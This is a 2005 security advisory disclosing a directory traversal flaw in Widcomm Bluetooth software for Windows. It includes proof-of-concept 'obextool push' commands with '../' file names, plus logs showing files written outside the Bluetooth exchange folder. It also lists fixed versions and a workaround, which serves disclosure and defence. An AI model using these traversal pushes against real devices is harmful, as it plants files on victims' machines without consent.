DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal' Author: Kevin Finisterre Vendor: http://66.45.42.84/Products, http://www.broadcom.com/press/release.php?id=525262 Product: 'versions older than BTW 3.0.1.905 ?' References: http://www.digitalmunition.com/DMA[2005-0412a].txt Description: On August 11 2004 in Advisory Reference ptl-2004-03 Pentest Limited released very minimal detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. CAN-2004-0775 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775 was created in order to provide information surrounding this issue. Unfortunately none of the links provided by the CVE entry contain any real data on the attacks. In efforts to document and exploit the above mentioned issues I stumbled upon yet an other problem. WIDCOMM Inc. which is short for Wireless Internet and Data/Voice Communications previously designed products for indoor wireless communications. Founded in June 1998, the company was focused on Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and inexpensive for people with PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to access the Internet. One May 10 2004 Broadcom Corporation, a leading provider of highly integrated semiconductor solutions enabling broadband communications, announced that had completed the acquisition of WIDCOMM. I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, D-link and Zoom and only one of them came with BlueSoleil instead of Widcomm based software. I would guess that somewhere around 90% of the PC Bluetooth hardware on the market currently comes with Widcomm install media. The dongle that I used for testing was an Ambicom BT2000C-US on windows XP SP2. The software that was bundled with the dongle was a variant of Widcomm's Bluetooth Software version 1.4.2. Several other revisions are available however due to problems with licensing you may find it difficult to make use of anything that did not specifically come packaged with your device. I even ran into an instance in which my purchased dongle did not even work with the software it was bundled with (Thanks D-Link!). Several sites document the difficulties that the end user is faced with when trying to use the various versions of the Widcomm software. Short of stating that Widcomm and Broadcomm have really done a huge disservice to their end users, I will not go into the fiasco surrounding license.dat issues. Fixing and or patching the vulnerabilities I am going to mention may be compounded by the fact that Widcomm and Broadcomm's customer base is simply unable to upgrade. Widcomm has in essence shot us all in the foot. After an install of the Widcomm software you are presented with the 'Initial Bluetooth Configuration' screen. Here you choose the name of your device and select the bluetooth services it will provide. By default 'PIM Item Transfer' is set to start automatically with no authentication required. Under normal circumstances files are dropped into "\Bluetooth Exchange Folder". Any device that attempts to transfer files to or from your device should be limited to accessing this folder. Unfortunately this is NOT the case, a simple ../ is enough to cause a little trouble. This attack can have its limitations depending on how the software settings are configured. Using a modified obextool binary from ussp-push we can easily demonstrate the problem. As stated above a normal transaction should limit files to the "\Bluetooth Exchange Folder" animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE testfile 3 Sending object ... BtserverSpylite output: 00:32:17.995 OPP: Settings for saving objects... 00:32:18.015 vCard's: 'Save to PIM' 00:32:18.035 vCal's: 'Do not accept' 00:32:18.055 vMsg's: 'Do not accept' 00:32:18.075 vNote's: 'Do not accept' 00:32:18.095 Other: 'Save to Inbox folder' 00:32:18.115 Folder: 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\' 00:32:18.135 OPP: File did not contain an object. Save to Inbox as 'other' type. 00:32:18.155 OPP: 'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder' C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder>dir Volume in drive C has no label. Volume Serial Number is F888-ED9A Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder 07/12/2005 12:32 AM . 07/12/2005 12:32 AM .. 07/12/2005 12:32 AM 262 testfile 1 File(s) 262 bytes 2 Dir(s) 35,701,919,744 bytes free We are however able to travel beyond the Bluetooth Exchange Folder by adding "../" to our request. Under the default configuration this allows us to write to the root of the My Documents folder. animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../Im_rick_james 3 Sending object ... 00:35:19.897 OPP: '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder' C:\Documents and Settings\Administrator\My Documents>dir Volume in drive C has no label. Volume Serial Number is F888-ED9A Directory of C:\Documents and Settings\Administrator\My Documents 07/12/2005 12:35 AM . 07/12/2005 12:35 AM .. 07/12/2005 12:35 AM 262 Im_rick_james 07/01/2005 08:38 PM Bluetooth 07/12/2005 12:32 AM Bluetooth Exchange Folder 07/01/2005 04:38 PM My Music 06/25/2005 02:55 PM My Pictures 06/27/2005 12:08 AM My Virtual Machines 1 File(s) 262 bytes 7 Dir(s) 35,701,919,744 bytes free Due to an unknown reason, when using the default configuration you are only able to go up one directory. Because of this you are limited to being able to write to the My Documents folder ONLY. his could be an XP SP2 thing. I have NOT tested this on windows 9x based software at all. In other words your results may vary. animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../../beiotch 3 Sending object ... 00:37:25.457 OPP: Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch' If you change the default drop directory from "\Bluetooth Exchange Folder" to something else we are able to traverse a good portion of the file system. In this example we used C:\test\test2\test3\test4 as our bluetooth drop folder. 00:57:38.471 OPP: Settings for saving objects... 00:57:38.481 vCard's: 'Save to PIM' 00:57:38.501 vCal's: 'Do not accept' 00:57:38.511 vMsg's: 'Do not accept' 00:57:38.532 vNote's: 'Do not accept' 00:57:38.542 Other: 'Save to Inbox folder' 00:57:38.562 Folder: 'C:\test\test2\test3\test4' 00:57:38.582 OPP: File did not contain an object. Save to Inbox as 'other' type. 00:57:38.602 OPP: '../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4' 00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46) 00:57:57.599 OPP: Settings for saving objects... 00:57:57.609 vCard's: 'Save to PIM' 00:57:57.629 vCal's: 'Do not accept' 00:57:57.649 vMsg's: 'Do not accept' 00:57:57.669 vNote's: 'Do not accept' 00:57:57.679 Other: 'Save to Inbox folder' 00:57:57.699 Folder: 'C:\test\test2\test3\test4' 00:57:57.719 OPP: File did not contain an object. Save to Inbox as 'other' type. 00:57:57.739 OPP: '../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4' 00:58:14.243 OPP: Settings for saving objects... 00:58:14.263 vCard's: 'Save to PIM' 00:58:14.283 vCal's: 'Do not accept' 00:58:14.293 vMsg's: 'Do not accept' 00:58:14.313 vNote's: 'Do not accept' 00:58:14.333 Other: 'Save to Inbox folder' 00:58:14.343 Folder: 'C:\test\test2\test3\test4' 00:58:14.363 OPP: File did not contain an object. Save to Inbox as 'other' type. 00:58:14.383 OPP: '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4' Again for some reason we run into a minor limitation on where the files can be dropped. 00:58:29.735 OPP: Settings for saving objects... 00:58:29.755 vCard's: 'Save to PIM' 00:58:29.775 vCal's: 'Do not accept' 00:58:29.795 vMsg's: 'Do not accept' 00:58:29.815 vNote's: 'Do not accept' 00:58:29.835 Other: 'Save to Inbox folder' 00:58:29.855 Folder: 'C:\test\test2\test3\test4' 00:58:29.875 OPP: File did not contain an object. Save to Inbox as 'other' type. 00:58:29.895 OPP: Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 'C:\test\test2\test3\test4\../../../../blah' As you can see the bluetooth drop directory can easily be ignored by the attacker. C:\>dir test\blah test\test2\blah test\test2\test3\blah Volume in drive C has no label. Volume Serial Number is F888-ED9A Directory of C:\test 07/12/2005 12:58 AM 262 blah 1 File(s) 262 bytes Directory of C:\test\test2 07/12/2005 12:57 AM 262 blah 1 File(s) 262 bytes Directory of C:\test\test2\test3 07/12/2005 12:57 AM 262 blah 1 File(s) 262 bytes I have not seen this issue documented anywhere. It was not described in the release by pentest.co.uk, nor was it mentioned in any advisory from Widcomm or Broadcomm. I am unable to tell exactly when this issue was introduced into the Widcomm codebase and I am equally unable to tell exactly when it was fixed. All of the above testing was performed against PC versions of the software, it is currently unknown how other Widcomm platforms are affected by this issue. I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for this condition). In these versions the "../" request is replaced with "..x" thus preventing the attack. Timeline associated with this bug: 04/12/2005 Public disclosure due to the fact that the bug was silently fixed by the vendor(s) in the past. Regurgitated Workaround: '...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternately users can 'set their Bluetooth device configuration to be non-discoverable or hidden.'. Please note however 'This will not stop the device from being vulnerable but it may limit the exposure.' Due to the fact that this issue was patched silently NO attempt was made to notify Broadcomm or Widcomm about this issue. The issue appears to have been patched in version 3.x. Unfortunately due to licensing issues users of this software will find it difficult to patch this vulnerability, and I found it difficult to research which versions were and were not vulnerable. Bug your vendor to get you some updated software and ask them to quit playing games over license.dat files! Other vendors are affected by similar issues and future advisories will be released. All your Bluetooth are belong to greenplaque. -KF